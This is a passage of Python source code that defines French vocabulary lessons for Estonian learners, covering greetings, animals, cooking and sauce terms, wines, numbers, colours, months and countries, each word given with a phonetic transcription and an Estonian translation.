ces ingrédients [säz Ä~gre'djA~] : need koostisained
c'est un crétin [sätÖ~ kre'tÄ~] : ta on kretiin
je dors [žə dOOr] : ma magan
j'ai tort [žee tOOr] : ma eksin
""")
Eestlastele.parse_words(Nom,u"""
la jambe [žA~mbə] : jalg
la chambre [šA~mbrə] : tuba
le agent [la' žA~] : agent
le chant [lə šA~] : laul
les gens [žA~] : inimesed, rahvas
les chants [šA~] : laulud
""")
if False:
Eestlastele.parse_words(None,u"""
le loup [lu] : hunt
la loupe [lup] : luup
la joue [žuu] : põsk
le jour [žuur] : päev
mou (m) [mu] : pehme
""")
#~ Reeglid.parse_words(NomPropre,u"""
#~ Winnetou [winə'tu] : (isegi maailmakuulsa apatši pealiku nime hääldavad prantslased valesti)
#~ """)
General.add_lesson(u"Tervitused", u"""
""")
General.parse_words(Autre,u"""
salut [sa'lü] : tervist
bonjour [bO~'žuur] : tere | head päeva | tere hommikust
bonsoir [bO~'swaar] : head õhtut
bonne nuit [bOnə 'nwi] : head ööd
au revoir [orə'vwaar] : nägemiseni
Monsieur [məs'jöö] : härra
Madame [ma'dam] : proua
Mademoiselle [madəmwa'zel] : preili
Comment t'appelles-tu? [ko'mA~ ta'päl tü] : Kuidas on sinu nimi?
Je m'appelle... [zə ma'päl] : Minu nimi on...
Comment vas-tu? [ko'mA~va'tü] : Kuidas sul läheb?
s'il vous plaît [silvu'plä] : palun (Teid)
s'il te plaît [siltə'plä] : palun (Sind)
merci [mer'si] : aitäh
merci beaucoup [mer'si bo'ku] : tänan väga
oui [wi] : jah
non [nO~] : ei
bon appétit [bOnappe'ti] : head isu
j'ai faim [žee fÄ~] : mul on kõht tühi
j'ai soif [žee swaf] : mul on janu
je suis fatigué [žə swi fati'gee] : ma olen väsinud
""")
if FULL_CONTENT:
General.add_lesson(u"Prantsuse automargid",columns=[FR,PRON],show_headers=False)
General.parse_words(NomPropre,u"""
Peugeot [pö'žo] : -
Citroën [sitro'än] : -
Renault [re'noo] : -
""")
General.add_lesson(u"Prantsuse eesnimed", u"""
""")
General.parse_words(NomPropre,u"""
Albert [al'bäär] : -
André [A~'dree] : Andre
Anne [anə] : Anne
Bernard [bär'naar] : -
Catherine [kat'rin] : Katrin
Charles [šarl] : Karl
François [frA~'swa] : -
Isabelle [iza'bäl] : Isabel
Jacques [žaak] : Jaak
Jean [žA~] : Jaan
Luc [lük] : Luukas
Marie [ma'rii] : Maria
Paul [pOl] : Paul
Philippe [fi'lip] : Filip
Pierre [pjäär] : Peeter
""")
General.add_lesson(u"Taluloomad", u"""
""")
General.parse_words(Nom,u"""
la chèvre ['šäävrə] : kits
la brebis [brə'bis] : lammas
le porc [pOOr] : siga
le cochon [ko'šO~] : siga
le cheval [šə'val] : hobune
la vache [vaš] : lehm
le taureau [to'roo] : pull
le veau [voo] : vasikas
le bœuf [bÖff] : härg
""")
General.add_lesson(u"Metsloomad", u"""
""")
General.parse_words(Nom,u"""
la chasse [šas] : jaht
le chasseur [ša'sÖÖr] : jahimees
le chevreuil [šəv'rÖj] : metskits
le cerf [säär] : hirv
la biche [biš] : emahirv
un élan [e'lA~] : põder
le lapin [la'pÄ~] : küülik
le lièvre [li'äävrə] : jänes
le renard [rə'naar] : rebane
un écureuil [ekü'rÖj] : orav
la souris [su'ri] : hiir
le blaireau [blä'roo] : mäger | habemeajamispintsel
le *hérisson [eri'sO~] : siil
la hermine [är'min] : hermeliin
la martre ['martrə] : nugis
la belette [bə'lät] : nirk
le loup [lu] : hunt
un ours [urs] : karu
le lynx [lÄ~ks] : ilves
le sanglier [sA~gli'e] : metssiga
le marcassin [marka'sÄ~] : metsseapõrsas
""")
# belette : nirk
if HAS_FUN and FULL_CONTENT:
Fun.add_lesson(u"Au clair de la lune", u"""
| Au clair de la lune,
| Mon ami Pierrot,
| Prête-moi ta plume
| Pour écrire un mot.
| Ma chandelle est morte,
| Je n'ai plus de feu ;
| Ouvre-moi ta porte,
| Pour l'amour de Dieu.
""")
Fun.parse_words(None,u"""
le clair de lune : kuuvalgus
un ami : sõber
""")
Fun.parse_words(Verbe,u"""
prêter : laenama
écrire : kirjutama
ouvrir : avama
""")
Fun.parse_words(None,u"""
la plume : sulg
""")
Fun.parse_words(Verbe,u"""
""")
Fun.parse_words(None,u"""
le mot : sõna
la chandelle : küünlalamp
""")
Fun.parse_words(Adjectif,u"""
mort | morte (adj.) : surnud
""")
Fun.parse_words(None,u"""
le feu [föö] : tuli
la porte [pOrt] : uks
un amour : armastus
Dieu : Jumal
""")
if HAS_FUN:
Fun.add_lesson(u"Sur le pont d'Avignon", u"""
| Sur le pont d'Avignon,
| on y danse, on y danse ;
| Sur le pont d’Avignon,
| on y danse tous en rond !
|
| Les beaux messieurs font comme ça,
| et puis encore comme ça.
|
| Les belles dames font comme ça,
| et puis encore comme ça.
|
| Les cordonniers font comme ça,
| et puis encore comme ça.
""")
Fun.parse_words(None,u"""
sur : peal
le pont [pO~] : sild
on danse tous ['dA~sə] : me kõik tantsime
en rond : ringis
les beaux messieurs : ilusad härrad
les belles dames : ilusad daamid
ils font [il fO~] : nad teevad
comme ci [kOm'sa] : niimoodi
comme ça [kOm'sa] : naamoodi
et puis encore [e pwi A~'kOOr] : ja siis veel
le cordonnier [kOrdon'jee] : kingsepp
""")
if HAS_FUN and FULL_CONTENT:
Fun.add_lesson(u"J'ai du bon tabac", u"""
| J'ai du bon tabac dans ma tabatière,
| J'ai du bon tabac, tu n'en auras pas.
| J'en ai du fin et du bien râpé
| Mais, ce n'est pas pour ton vilain nez
| J'ai du bon tabac dans ma tabatière
| J'ai du bon tabac, tu n'en auras pas
""")
if FULL_CONTENT:
General.add_lesson(u"Linnud", u"""
""")
General.parse_words(Nom,u"""
le oiseau [wa'zoo] : lind
la poule [pul] : kana
le poulet [pu'lä] : tibu | kanapoeg
la oie [wa] : hani
le dindeon [dÄ~dO~] : kalkun
la dinde [dÄ~də] : emakalkun
le pigeon [pi'žO~] : tuvi
""")
Kokadele.add_lesson(u"Katame lauda!", u"""
""")
Kokadele.parse_words(Nom,u"""
la table ['taablə] : laud
la chaise [šääz] : tool
le couteau [ku'too] : nuga
la fourchette [fur'šet] : kahvel
la cuillère [kwi'jäär] : lusikas
les couverts [ku'väär] : noad-kahvlid
la assiette [as'jät] : taldrik
le bol [bOl] : joogikauss
le verre [väär] : klaas
la tasse [tas] : tass
le plat [pla] : kauss
""")
Kokadele.add_lesson(u"Joogid", u"""""")
Kokadele.parse_words(Nom,u"""
la boisson [bwa'sO~] : jook
la bière [bjäär] : õlu
la eau [oo] : vesi
le jus [žu] : mahl
le café [ka'fee] : kohv
le thé [tee] : tee
le vin rouge [vÄ~ 'ruuz]: punane vein
le vin blanc [vÄ~ 'blA~]: valge vein
le vin rosé [vÄ~ ro'zee] : roosa vein
le cidre ['siidrə] : siider
la région [rež'jO~] : regioon, ala
le terroir [ter'waar] : geograafiline veinirühm
la appellation d'origine contrôlée (AOC) [apela'sjO~ dori'žin kO~trO'lee] : kontrollitud päritolumaa nimetus
la bavaroise [bavaru'aaz] : jook teest, piimast ja liköörist
""")
Kokadele.add_lesson(u"Menüü", intro=u"""""")
Kokadele.parse_words(Nom,u"""
le plat [pla] : roog
le plat du jour [pla dü žuur] : päevapraad
le *hors d'œuvre [OOr 'dÖÖvrə] : eelroog
le dessert [des'säär] : magustoit
""")
Kokadele.add_lesson(u"Supid", u"""
""")
Kokadele.parse_words(Nom,u"""
la soupe [sup] : supp
le potage [po'taaž] : juurviljasupp
le potage purée [po'taažə pü'ree] : püreesupp
le velouté [vəlu'tee] : koorene püreesupp
le velouté Dubarry [vəlu'tee düba'ri] : koorene püreesupp lillkapsaga
le bouillon [bui'jO~] : puljong
le consommé [kO~som'mee] : selge puljong
le consommé de volaille [kO~som'mee də vo'lajə] : linnulihast puljong
le consommé de gibier [kO~som'mee də žib'jee] : ulukilihast puljong
le consommé de poisson [kO~som'mee də pwa'sO~] : kala puljong
le consommé double [kO~som'mee 'duublə] : kahekordne puljong
#rammuleem?
""")
Kokadele.add_lesson(u"Liha", u"""
""")
Kokadele.parse_words(Nom,u"""
la viande [vjA~də] : liha
la volaille [vo'lajə] : linnuliha
le poulet [pu'lä] : kana
le gibier [žibiee] : jahiloomad
la boucherie [bušə'rii] : lihakauplus, lihakarn
le lard [laar] : pekk
le jambon [žA~'bO~] : sink
la saucisse [soo'sis] : vorst
la graisse [gräs] : rasv
le os [os] : kont
la côte [koot] : ribi
le dos [do] : selg
la cuisse [kwis] : kints
la langue [lA~gə] : keel
le foie [fwa] : maks
les tripes [trip] : soolestik
le cœur [kÖÖr] : süda
le rognon [ron'jO~] : neer (kulin.)
la cervelle [ser'vell] : aju
les abats [a'ba] : subproduktid (maks,süda, neerud, keel, jalad)
""")
Kokadele.add_lesson(u"Kala", u"""
""")
Kokadele.parse_words(Nom,u"""
le poisson [pwa'sO~] : kala
les crustacés [krüsta'see] : karploomad | koorikloomad
le brochet [bro'šä] : haug
la anguille [A~'giijə] : angerjas
la perche [pärš] : ahven
le *hareng [ar'A~] : heeringas
le sprat [sprat] : sprot
le thon [tO~] : tuunikala
le requin [rə'kÄ~] : haikala
""")
Kokadele.add_lesson(u"Liharoad", u"""""")
Kokadele.parse_words(Nom,u"""
la escalope [eska'lOp] : eskalopp, šnitsel
le ragoût [ra'gu] : raguu
la roulade [ru'laadə] : rulaad
la paupiette [pop'jät] : liharull
le aspic [as'pik] : sült
le filet [fi'lä] : filee | võrk
le bifteck [bif'täk] : biifsteek
la brochette [bro'šät] : lihavarras, šašlõk
les attereaux [attə'roo] : fritüüris praetud varras, paneeritud šašlõk
la côtelette [kot'lät] : naturaalne kotlet
la côtelette de porc [kot'lät də pOOr] : sealiha kotlet
la noisette de porc [nwa'zät də pOOr] : filee sealiha
le goulasch [gu'laš] : guljašš
le *hachis [ha'ši] : hakkliha
la boulette [bu'lett] : lihapall
le tournedos [turnə'do] : veise sisefilee portsjon toode
la entrecôte [A~trə'koot] : antrekoot
le Chateaubriand [šatobri'A~] : praetud liharoog
le carré d'agneau [ka'ree dan'joo] : praetud tallerind
la poitrine d'agneau farcie [pwa'trin dan'joo far'sii] : täidetud tallerind
le cœur de filet [kÖÖr də fi'lä] : veise sisefilee
le filet mignon [fi'lä min'jO~] : veise sisefilee portsjon toode
le filet médaillon [fi'lä meda'jO~] : medaljon (veise sisefilee portsjon toode)
le médaillon de veau [meda'jO~ də'voo] : vasika medaljon
le bœuf bourguignon [bÖff burgin'jO~] : härjapraad burgundia veiniga
le bœuf à la tartare [bÖff a la tar'taar] : väiketükiline toode sisefileest
le bœuf à la Strogonov [bÖff a la strogo'nov] : böfstrogonov
le sauté de bœuf à la suédoise [so'tee də bÖff a la süee'dwaazə] : klopsid
le sauté de veau [so'tee də voo] : pajaroog vasikalihast
la selle de mouton [säl də mu'tO~] : lamba (talle) sadul
""")
Kokadele.add_lesson(u"Road", intro=u"""""")
Kokadele.parse_words(Nom,u"""
la purée [pü'ree] : püree
le œuf [Öf] : muna
les œufs brouillés [öö brui'jee] : omlett
les œufs pochés [öö po'šee] : ilma kooreta keedetud muna
le gratin [gra'tÄ~] : gratään (ahjus üleküpsetatud roog)
le gratin dauphinois [gra'tÄ~ dofinw'a] : (tuntud retsept)
le gratin savoyard [gra'tÄ~ savwa'jaar] : (juustuga gratin dauphinois)
le soufflé [suff'lee] : suflee
la quiche lorraine [kiš lo'rään] : quiche
la pâte brisée [paat bri'zee] : (Mürbeteig, shortcrust pastry)
la tourte [turt] : (ingl. *pie*)
la fondue [fO~'düü] : fondüü
le fumet [fü'mä] : hea lõhn (nt. veini, liha kohta)
le pâté [pa'tee] : pasteet
le pâté en croûte [pa'tee A~'krut] : küpsetatud taignas pasteet
le pâté en terrine [pa'tee A~ter'rin] : küpsetatud pasteet kausis
la galantine [galA~'tin] : galantiin
le cassoulet [kasu'lä] : Languedoc'ist pärit ühepajatoit ubadest ja lihast, mida küpsetatakse mitu tundi madala temperatuuriga ahjus.
le pot-au-feu [poto'föö] : ühepajatoit
""")
Kokadele.add_lesson(u"Juust", u"""""")
Kokadele.parse_words(None,u"""
le fromage [fro'maaž] : juust
la caillebotte [kajə'bott] : (kodujuust)
la raclette [rak'lett] : kuumaga sulatud juust
le Camembert [kamA~'bäär] : (valgehallitusjuust)
le Emmental [emən'taal] : suurte augudega kõva juust
le Rocquefort [rOk'fOOr] : (sinihallitusjuust)
le Gruyère [grüi'jäär] : -
le Edam [e'dam] : -
le Brie [brii] : -
le Parmesan [parmə'zA~] : -
""")
Kokadele.add_lesson(u"Magustoidud", u"""""")
Kokadele.parse_words(Nom,u"""
le dessert [des'säär] : magustoit
la crème [krääm] : koor
la crème fraiche [krääm 'fräš] : rõõsk koor
la crème brûlée [krääm brü'lee] : põletud koor
la crème bavaroise [krääm bavaru'aaz] : muna-piima-seguga kreem želatiiniga
la sauce melba [soos mel'ba] : melba kaste
la sauce vanille [soos va'niijə] : vanillikaste
la sauce caramel [soos kara'mäl] : karamellkaste
la crêpe [kräp] : pannkook
la glace [glass] : jäätis
le sorbet [sor'bä] : jäätis (ilma kooreta)
le parfait [par'fä] : parfee
le gâteau [ga'too] : kook
la gaufre ['goofrə] : vahvel
la tarte [tart] : tort
la compote [kO~'pOt] : kompott
la gelée [žə'lee] : tarretis
la confiture [kO~fi'tüür] : moos | keedis
la mousse [mus] : vaht
la tarte aux prunes [tarto'prün] : ploomikook
la salade de fruits [sa'laad də frü'i] : puuviljasalat
la salade de baies [sa'laad də bä] : marjasalat
le petit-beurre [pəti'bÖÖr]: (kuiv küpsis)
""")
Kokadele.add_lesson(u"Puuviljad", u"""""")
Kokadele.parse_words(Nom,u"""
le fruit [frü'i] : puuvili
le ananas [ana'na] : ananass
la banane [ba'nan] : banaan
le citron [si'trO~] : sidrun
la orange [o'rA~ž] : apelsin
la pomme [pom] : õun
la poire [pu'aar] : pirn
la prune [prünn] : ploom
la cerise [sə'riiz] : kirss
la noix [nwa] : pähkel
la noisette [nwa'zett] : sarapuupähkel
""")
Kokadele.add_lesson(u"Marjad", u"""""")
Kokadele.parse_words(Nom,u"""
la baie [bä] : mari
la fraise [frääz] : maasikas
la myrtille [mir'tiijə] : mustikas
la mûre [müür] : põldmari
la groseille [gro'zeijə] : sõstar (punane v. valge) | tikker
le cassis [ka'sis] : mustsõstar
""")
Kokadele.add_lesson(u"Juurviljad", u"""""")
Kokadele.parse_words(Nom,u"""
la légume [le'güm] : juurvili
la pomme de terre [pom də 'täär] : kartul
la tomate [to'mat] : tomat
la carotte [ka'rOt] : porgand
# la betterave []
# le panais
# le radis
# le salsifis
# le cerfeuil
la asperge [as'pärž] : spargel
le épinard [epi'naar] : spinat
le concombre [kO~kO~brə]: kurk
le *haricot [ari'ko] : uba
la salade [sa'laadə] : salat
la endive [A~'diiv] : endiiv
# le chicon [ši'kO~] :
le chou [šu] : kapsas
le chou-fleur [šu 'flÖÖr] : lillkapsas
""")
Kokadele.add_lesson(u"Teraviljad", u"""""")
Kokadele.parse_words(Nom,u"""
le blé [blee] : teravili
la avoine [avu'ann] : kaer
le froment [fro'mA~] : nisu
le sarrasin [sara'zÄ~] : tatar
le blé noir [blee'nwaar] : tatar
le riz [ri] : riis
le seigle ['sääglə] : rukis
le orge ['Oržə] : oder
""")
Kokadele.add_lesson(u"Teraviljatooded", u"""""")
Kokadele.parse_words(Nom,u"""
le riz pilaf [ri pi'laf] : pilaff
les pâtes ['paat] : pastaroad
la farine [far'in] : jahu
la bouillie [bui'jii] : puder
le gruau [grü'oo] : puder
le pain [pÄ~] : sai | leib
la tartine [tar'tin] : võileib
la baguette [ba'gät] : prantsuse pikk sai
le croustillon [krusti'jO~] : õlis praetud kohupiimapall
le crouton [kru'tO~] : krutoon
""")
Kokadele.add_lesson(u"Koostisosad", u"""""")
Kokadele.parse_words(Nom,u"""
le ingrédient [Ä~gre'djA~] : koostisosa
le lait [lä] : piim
le beurre [bÖÖr]: või
la crème [kr'ääm] : kreem | koor
le sucre ['sükrə] : suhkur
le sel [säl] : sool
le poivre ['pwaavrə] : pipar
""")
Kokadele.add_lesson(u"Ürdid", u"""""")
Kokadele.parse_words(Nom,u"""
le assaisonnement [asäzon'mA~] : maitsestamine
le condiment [kO~di'mA~] : maitseaine
la épice [e'pis] : vürts
les fines herbes [fin'zärbə] : fines herbes ("peened ürdid")
une herbe [ärbə] : ürt
le persil [pär'sil] : petersell
le céléri [sele'ri] : seller
la gousse d'ail [guss 'daij] : küüslaugu küün
l'ail (m) [aj] : küüslauk
un oignon [on'jO~] : sibul
la ciboulette [sibu'lät] : murulauk
la câpre ['kaaprə] : kappar
le gingembre [žÄ~žA~brə] : ingver
""")
Kokadele.add_lesson(u"Köögis", u"""""")
Kokadele.parse_words(Nom,u"""
la cuisine [kwi'zin] : köök
la cuisinière [kwizin'jäär] : pliit
le four [fuur] : ahi
le four à micro-ondes [fuur a mikro 'O~də] : mikrolaine ahi
le moulin [mu'lÄ~] : veski
le congélateur [kO~gela'tÖÖr] : külmutuskapp
un évier [evi'ee] : kraanikauss
la armoire [arm'waar] : kapp
le placard [pla'kaar] : seinakapp
""")
Kokadele.add_lesson(u"Köögiriistad", u"""""")
Kokadele.parse_words(Nom,u"""
le fouet [fu'ä] : vispel
la louche [lušə] : kulp
la alumette [alu'mätə] : tuletikk
la coquille [ko'kiijə] : merekarp
la cocotte [ko'kot] : malmkastrul, kokott
la poêle [pwal] : pann
la râpe [rap] : riiv
la casserole [kas'roll] : kastrul
la russe [rüs] : kastrul
la marmite [mar'mit] : katel
la braisière [bräz'jäär] : pott smoorimiseks
le caquelon [kak'lO~] : fondüüpott
le bain-marie [bÄ~ma'rii] : veevann
la passoire [pas'waar] : sõel
""")
Kokadele.add_lesson(u"Mida kokk teeb", intro=u"""
""")
Kokadele.parse_words(Verbe,u"""
préparer [prepa'ree] : ette valmistama
# composer [kO~po'zee] : koostama
# baisser [bäs'see] : alla laskma, madaldama
# porter [por'tee] : kandma
laver [la'vee] : pesema
concasser [kO~kas'see] : peenestama (tükkideks)
farcir [far'siir] : farssima (täidisega täitma)
*hacher [a'šee] : hakkima
éplucher [eplü'šee]: koorima
émincer [émÄ~'see] : lõikama viiludeks
tourner [tur'nee] : keerama, pöörama
# utiliser [ütili'zee] : kasutama
préchauffer [préšoo'fee] : ette kütma
""")
Kokadele.add_lesson(u"Pliidil", u"""""")
Kokadele.parse_words(Nom,u"""
la cuisson [küis'sO~] : keetmine
le blanchiment [blA~ši'mA~] : blanšeerimine
le rôtissage [rotis'saaž] : praadimine (panni peal)
le rissolement [risol'mA~] : praadimine
la friture [fri'tüür] : friipraadimine (õlis või rasvas)
le grillage [gri'jaaž] : röstimine
le braisage [bre'zaaž] : smoorimine
""")
#~ le bain marie [bÄ~ ma'rii] :
Kokadele.parse_words(Verbe,u"""
cuire [kwiir] : keetma
blanchir [blA~'šiir] : blanšeerima
rôtir [ro'tiir] : praadima (panni peal)
rissoler [risso'lee]: (rasvas) pruunistama
frire [friir] : praadima (õlis)
griller [gri'jee] : röstima
braiser [brä'zee] : smoorima
""")
if FULL_CONTENT:
General.add_lesson(u"Linnad prantsusmaal",columns=[GEON("Linn"), GEOM, GEOF])
General.parse_words(NomGeographique,u"""
Avignon [avin'jO~] | avignonnais [avinjo'nä] | avignonnaise [avinjo'nääz] : -
Bordeaux [bor'doo] | bordelais [bordə'lä] | bordelaise [bordə'lääz] : -
Bourgogne [burgOnjə] | bourguignon [burgin'jO~] | bourguignonne [burgin'jOnn] : -
Dijon [di'žO~] | dijonnais [dižon'nä] | dijonnaise [dižon'nääz] : -
Lyon [li'O~] | lyonnais [lio'nä] | lyonnaise [lio'nääzə] : -
Marseilles [mar'säijə] | marseillais [marsäi'jä]| marseillaise [marsäi'jääz] : -
Paris [pa'ri] | parisien [pariz'jÄ~]| parisienne [pariz'jän] : Pariis
Reims [rÄ~s] | rémois [rem'wa]| rémoise [rem'waaz] : Reims
Verdun [vär'dÖ~] | verdunois [värdü'nwa]| verdunoise [värdü'nwaaz] : -
Versailles [ver'saj] | versaillais [värsa'jä] | versaillaise [värsa'jääz] : -
""")
#~ Vocabulary.parse_words(NomGeographique,u"""
#~ la France [frA~s] : Prantsusmaa
#~ la Belgique [bel'žik] : Belgia
#~ une Allemagne [al'manjə] : Saksamaa
#~ une Angleterre [A~glə'täär] : Inglismaa
#~ une Estonie [ästo'nii]: Eesti
#~ une Hollande [o'lA~də]: holland
#~ une Espagne [es'panjə]: hispaania
#~ une Italie [ita'lii]: hispaania
#~ """)
#~ Vocabulary.parse_words(Adjectif,u"""
#~ français [frA~'sä] | français [frA~'sääz] : prantsuse
#~ estonien [esto'njÄ~] | estonien [esto'njän] : eesti
#~ espagnol [espan'jol] | espagnole [espan'jol] : hispaania
#~ hollandais [olA~'dä] | hollandaise [olA~'dääz]: holandi
#~ """)
Kokadele.add_lesson(u"Omadussõnad (kulinaaria)", intro=u"""
Selliseid omadussõnu leidub erinevates kulinaaria väljundites.
""",columns=[M, F, ET])
Kokadele.parse_words(Adjectif,u"""
beurré [bÖÖ'ree] | beurrée [bÖÖ'ree]: võiga
braisé [brä'zee] | braisée [brä'zee] : smooritud
coupé [ku'pee] | coupée [ku'pee] : lõigatud
épicé [epi'see] | épicée [epi'see] : vürtsitatud, vürtsikas
glacé [glas'see] | glacée [glas'see] : jäätunud
haché [a'šee] | hachée [a'šee] : hakkitud
manié [man'jee] | maniée [man'jee] : käsitletud
poché [po'še] | pochée [po'šee] : uputatud keeva vette
rissolé [riso'lee] | rissolée [riso'lee] : (rasvas) pruunistatud
sauté [soo'tee] | sautée [soo'tee] : rasvas praetud
velouté [velu'tee] | veloutée [velu'tee] : sametine, sametitaoline
bouilli [bui'ji] | bouillie [bui'jii] : keedetud
croustillant [krusti'jA~] | croustillante [krusti'jA~t] : krõbe
piquant [pi'kA~] | piquant [pi'kA~t] : terav
gourmand [gur'mA~] | gourmande [gur'mA~d] : maiasmokk
paysan [pei'zA~] | paysanne [pei'zann] : talu-, talupoja-
royal [rwa'jal] | royale [rwa'jal] : kuninglik
suprême (mf) [sü'prääm] : ülem, kõrgem, ülim
""")
Kokadele.add_lesson(u"Kastmete valmistamine", intro=u"""""")
Kokadele.parse_words(Nom,u"""
la sauce [soos] : kaste
la moutarde [mu'tardə] : sinep
le vinaîgre [vin'äägrə] : äädikas
la mayonnaise [majo'nääz] : majonees
la vinaîgrette [vine'grät] : vinegrett
le beurre manié [bÖÖr man'jee]: jahuvõi
le roux [ru] : rasvas kuumutatud jahu
le roux blanc [ru blA~] : valge segu
le roux blond [ru blO~] : kollane segu
le roux brun [ru brÖ~] : pruun segu
la sauce espagnole [espan'jOl] : pruun põhikaste
la sauce demi-glace [dəmi'glas] : redutseeritud pruun põhikaste
le jus de rôti [žu də ro'ti] : redutseeritud puljong, "praeliha mahl"
le jus lié [žu li'ee] : maisi või nooljuurejahuga pruun kaste
le mirepoix [mirə'pwa] : praetud kuubikud (sibul, porgand, seller)
la coupe en dés [kup A~ 'dee] : lõikamine kuubikuteks
la coupe en brunoise [kup A~ brün'waaz] : juurvilja lõikamine kuubikuteks (2mm)
la coupe julienne [kup jül'jän] : juurvilja lõikamine ribadeks (2mm)
la coupe jardinière [kup žardin'jäär] : juurvilja lõikamine ribadeks
la coupe à la paysanne [kup ala päi'zan] : juurvilja lõikamine ketasteks
""")
Kokadele.add_lesson(u"Kastmed", intro=u"""""")
Kokadele.parse_words(Nom,u"""
la sauce paysanne [pei'zan] : talupoja kaste
la sauce chasseur [ša'sÖÖr] : jahimehe kaste
la sauce jardinière [žardin'jäär] : aedniku kaste
la sauce piquante [pi'kA~tə] : pikantne kaste
la sauce poivrade [pwav'raadə] : piprakaste
la sauce Grand Veneur [grA~ və'nÖÖr] : jäägri kaste
la sauce Bigarrade [biga'raadə] : apelsinikaste
la sauce smitane [smi'tanə] : hapukoorekaste
la sauce Lyonnaise [lio'nääzə] : pruun sibulakaste
la sauce Bourguignonne [burgin'jOn] : Burgundia kaste
la sauce Robert [ro'bäär] : Roberti kaste
la sauce Madère [ma'däär] : Madeira kaste
la sauce Mornay [mOr'nä] : juustukaste
la sauce Porto [pOr'to] : portveini kaste
la sauce Sabayon [saba'jO~] : Sabayon-kaste
la sauce italienne [ital'jän] : itaalia kaste
la sauce veloutée [vəlu'tee] : hele põhikaste
la sauce blanche [blA~šə] : tuletatud hele kaste
la sauce bordelaise [bOrdə'lääz] : punase veini kaste
la sauce béarnaise [bear'nääz] : bernoo kaste
la sauce béchamel [beša'mäl] : valge põhikaste
la sauce aurore [o'rOOr] : aurorakaste
la sauce Choron [šo'rO~] : choronkaste
la sauce Foyot [fwa'jo] : foyotkaste
la macédoine [mase'dwan] : juurviljasalat
""")
Kokadele.add_lesson(u"Veinialad Prantsusmaal", u"""
""",columns=[FR,PRON])
Kokadele.parse_words(NomGeographique,u"""
Alsace [al'zas] : Elsass
Beaujolais [boožo'lä] : -
Bordeaux [bOr'doo] : -
Bourgogne [bur'gonjə] : -
Champagne [šA~'panjə] : -
Charente [ša'rA~tə] : -
Poitou [pwa'tu] : -
Corse ['korsə] : Korsika
Jura [žü'ra] : -
Savoie [savu'a] : -
Languedoc [lA~gə'dok] : -
Roussillon [russi'jO~] : -
Provence [pro'vA~sə] : -
Sud-Ouest [süd'uest] : -
Gascogne [gas'konjə] : -
Val de Loire [val də 'lwaarə] : Loire'i org
Vallée du Rhône [val'lee dü roonə] : Rhône'i org
""")
Kokadele.add_lesson(u"Prantsuse veinid", u"""
Prantsuse veinid on üle 400, siin ainult mõned.
""",columns=[FR,PRON])
Kokadele.parse_words(Nom,u"""
le Chasselas [šas'la] : -
le Grand Cru [grA~'krü] : -
le Pinot Noir [pi'no nwaar] : -
la Côte de Brouilly [koot də bru'ji] : -
le Saint-Amour [sÄ~ta'muur] : -
le Bordeaux clairet [bOr'doo klä'rä] : -
le Médoc [me'dok] : -
le Saint-Émilion [sÄ~temi'jO~] : -
la Côte de Beaune [koot də boon] : -
les Côtes du Ventoux [kootə du vA~'tu] : -
le Minervois [minerv'wa] : -
les Côtes d'Auvergne [kootə do'värnjə] : -
""")
if FULL_CONTENT:
General.add_lesson(u"Omadussõnad (üld)", intro=u"""
Omadussõnad, mis lõpevad "e"-ga, ei muutu soo järgi.
""",columns=[M, F, ET])
General.parse_words(Adjectif,u"""
chaud [šoo] | chaude [šoodə] : kuum
froid [fru'a] | froide [fru'aadə] : külm
gros [gro] | grosse [grossə] : paks
mince (mf) [mÄ~s] : õhuke
bon [bO~] | bonne [bonnə] : hea
beau [boo] | belle [bälə] : ilus
joli [žo'li] | jolie [žo'lii] : ilus
demi [də'mi] | demie [də'mii]: pool
entier [A~'tjee] | entière [A~'tjäär] : terve, täis
double (mf) ['duublə] : topelt
facile (mf) [fa'sil] : lihtne
possible (mf) [po'siblə] : võimalik
""")
General.add_lesson(u"Loeme kümneni", intro=u"""""")
General.parse_words(Numerique,u"""
un [Ö~] : üks
deux [döö] : kaks
trois [trwa] : kolm
quatre [katrə] : neli
cinq [sÄ~k] : viis
six [sis] : kuus
sept [sät] : seitse
huit [üit] : kaheksa
neuf [nÖf] : üheksa
dix [dis] : kümme
""")
General.add_lesson(u"Värvid", columns=[M, F, ET])
General.parse_words(Adjectif,u"""
brun [brÖ~] | brune [brün] : pruun
vert [väär] | verte [värtə] : roheline
bleu [blöö] | bleue [blöö] : sinine
rouge (mf) [ruuž] : punane
jaune (mf) [žoon] : kollane
blond [blO~] | blonde [blO~də] : blond
beige (mf) [bääž] : beež
orange (mf) [o'rA~ž] : oranž
blanc [blA~] | blanche [blA~š] : valge
noir [nwaar] | noire [nwaar] : must
""")
General.add_lesson(u"Kuud")
General.parse_words(NomPropre,u"""
janvier [žA~vi'ee] : jaanuar
février [fevri'ee] : veebruar
mars [mars] : märts
avril [a'vril] : aprill
mai [mä] : mai
juin [žwÄ~] : juuni
juillet [žwi'jä] : juuli
août [ut] : august
septembre [sep'tA~brə] : september
octobre [ok'tOObrə] : oktoober
novembre [no'vA~brə] : november
décembre [de'sA~brə] : detsember
""")
u"""
On met une majuscule
uniquement quand l'adjectif est employé comme
nom pour désigner une personne.
Ex. : Les Français parlent en français à leurs amis français
"""
General.add_lesson(u"Riigid",columns=[GEON("Riik"), GEOM, GEOF, ET])
General.parse_words(None,u"""
la France [frA~s] | français [frA~'sä] | française [frA~'sääz] : Prantsusmaa
l'Estonie (f) [ästo'nii] | estonien [esto'njÄ~] | estonienne [esto'njän] : Eesti
l'Allemagne (f) [al'manjə] | allemand [al'mA~]| allemande [al'mA~də] : Saksamaa
l'Angleterre (f) [A~glə'täär] | anglais [A~'glä]| anglaise [A~'glääz] : Inglismaa
la Belgique [bel'žik] | belge [belžə]| belge [belžə] : Belgia
la *Hollande [o'lA~də] | hollandais [olA~'dä] | hollandaise [olA~'dääz] : Holland
l'Espagne (f) [es'panjə] | espagnol [espan'jol] | espagnole [espan'jol] : Hispaania
l'Italie (f) [ita'lii] | italien [ital'jÄ~]| italienne [ital'jen] : Itaalia
""")
if FULL_CONTENT:
General.add_lesson(u"Kuulsad inimesed")
General.parse_words(NomPropre,u"""
Jacques Chirac [žaak ši'rak] : # endine president
Georges Brassens [žorž bra'sÄ~s] : # laulja
Brigitte Bardot [bri'žit bar'do] : # laulja
Louis de Funès [lu'i də fü'nääz] : # näitleja
""")
General.add_lesson(u"Majad ja nende osad")
General.parse_words(Nom,u"""
la maison [mä'zO~] : maja
la cave [kaav] : kelder
la cuisine [kwi'zin] : köök
la salle de bain : vannituba
la chambre à coucher : magamistuba
le salon [sa'lO~] : elutuba
un escalier [eskal'jee] : trepp
la fenêtre [fə'näätrə] : aken
le parterre [par'täär] : esimene korrus
